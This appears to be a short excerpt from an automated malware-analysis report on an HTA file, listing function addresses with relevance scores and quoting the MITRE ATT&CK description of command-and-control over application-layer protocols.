createdbetterthingswithgreatnressgivenmebackwithnice.hta

Function 04637A18 Relevance: 1.9, APIs: 1, Instructions: 358
COMMON

Function 070A1F40 Relevance: 6.8, Strings: 5, Instructions: 580
COMMON

Function 070A4610 Relevance: 2.9, Strings: 2, Instructions: 438
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre